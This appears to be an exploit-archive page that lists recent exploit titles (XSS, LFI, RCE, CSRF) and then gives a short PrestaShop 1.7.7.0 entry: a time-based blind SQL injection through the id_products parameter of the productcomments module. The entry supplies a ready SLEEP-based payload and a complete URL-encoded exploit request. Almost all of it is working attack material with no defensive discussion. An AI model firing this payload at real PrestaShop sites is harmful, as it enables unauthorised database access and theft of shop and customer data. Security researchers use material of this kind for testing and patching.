66f2f8c3b5
9 changes to exploits/shellcodes PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval EyesOfNetwork 5.3 - RCE & PrivEsc Anchor CMS 0.12.7 - 'markdown' Stored Cross-Site Scripting EyesOfNetwork 5.3 - LFI Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting WordPress Plugin Custom Global Variables 1.0.5 - 'name' Stored Cross-Site Scripting (XSS) OpenCart 3.0.36 - ATO via Cross Site Request Forgery Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
14 lines
No EOL
563 B
Text
14 lines
No EOL
563 B
Text
# Exploit Title: Prestashop 1.7.7.0 - 'id_product' Time Based Blind SQL Injection
|
|
# Date: 08-01-2021
|
|
# Exploit Author: Jaimin Gondaliya
|
|
# Vendor Homepage: https://www.prestashop.com
|
|
# Software Link: https://www.prestashop.com/en/download
|
|
# Version: Prestashop CMS - 1.7.7.0
|
|
# Tested on: Windows 10
|
|
|
|
Parameter: id_product
|
|
|
|
Payload: 1 AND (SELECT 3875 FROM (SELECT(SLEEP(5)))xoOt)
|
|
|
|
Exploit:
|
|
http://localhost/shop//index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(5)))xoOt) |